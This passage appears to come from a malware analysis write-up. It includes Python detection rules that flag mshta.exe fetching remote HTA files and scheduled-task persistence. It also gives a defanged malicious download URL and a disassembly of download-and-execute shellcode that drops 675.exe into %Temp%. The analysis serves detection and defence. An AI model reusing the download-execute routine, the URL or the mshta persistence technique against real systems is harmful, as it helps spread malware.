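    if not first_token(cmdline).lower().endswith("mshta.exe"):
        return None
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def scheduled_mshta_url(cmdline):
    """URL if a task-scheduling command registers mshta.exe plus a remote
    URL as the action, which is how the infection keeps re-fetching 33t.php."""
    if not TASK_TOOL_RE.search(cmdline) or "mshta" not in cmdline.lower():
        return None
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def detect(events):
    """Return (rule, url, parent image) for every event matching a rule."""
    hits = []
    for e in events:
        url = mshta_remote_url(e["cmdline"])
        if url:
            hits.append(("mshta_remote_hta", url, e["parent"]))
            continue
        url = scheduled_mshta_url(e["cmdline"])
        if url:
            hits.append(("scheduled_mshta_remote_hta", url, e["parent"]))
    return hits
```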

hxxp://12-2005-search.com/cool.exe is then downloaded and executed as %Temp%\675.exe. The download link, however, is no longer active.


004002CD . 68 90000000 PUSH 90
004002D2 . 891C24 MOV DWORD PTR SS:[ESP],EBX
004002D5 . 68 90000000 PUSH 90
004002DA . C70424 0401000>MOV DWORD PTR SS:[ESP],104
004002E1 . 68 D0034000 PUSH
004002E6 . 58 POP EAX
004002E7 . E8 00000000 CALL setup.004002EC
004002EC $ 830424 06 ADD DWORD PTR SS:[ESP],6
004002F0 . FFE0 JMP EAX ;
004002F2 E8 DB E8
004002F3 01 DB 01
004002F4 00 DB 00
004002F5 00 DB 00
004002F6 . 0008 ADD BYTE PTR DS:[EAX],CL
004002F8 . 5D POP EBP
004002F9 . 33C9 XOR ECX,ECX
004002FB . 8A4D 00 MOV CL,BYTE PTR SS:[EBP]
004002FE . 8BFB MOV EDI,EBX
00400300 . 03F8 ADD EDI,EAX
00400302 . BE 08024000 MOV ESI,setup.00400208 ; ASCII "675.exe"
00400307 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00400309 . 51 PUSH ECX
0040030A . 51 PUSH ECX
0040030B . 53 PUSH EBX
0040030C . E8 23000000 CALL setup.00400334
00400311 . 68 74 74 70 3A>ASCII "http://"
00400318 . 31 32 2D 32 30>ASCII "12-2005-search.c"
00400328 . 6F 6D 2F 63 6F>ASCII "om/cool.exe",0
00400334 $ 51 PUSH ECX
00400335 . 68 E2034000 PUSH
0040033A . 58 POP EAX
0040033B . E8 00000000 CALL setup.00400340
00400340 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400344 . FFE0 JMP EAX
00400346 . 51 PUSH ECX
00400347 . 53 PUSH EBX
00400348 . 68 DC034000 PUSH
0040034D . 58 POP EAX
0040034E . E8 00000000 CALL setup.00400353
00400353 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400357 . FFE0 JMP EAX


The malware uses random filenames, as we can see from the filenames used in the embedded script above. These are possibly randomly generated by the PHP code behind it.

In effect, the malware creates heaps of batch files, text files, blank .exe files (unavailable download), and .job files on the affected system. Talk about heavy digital clutter!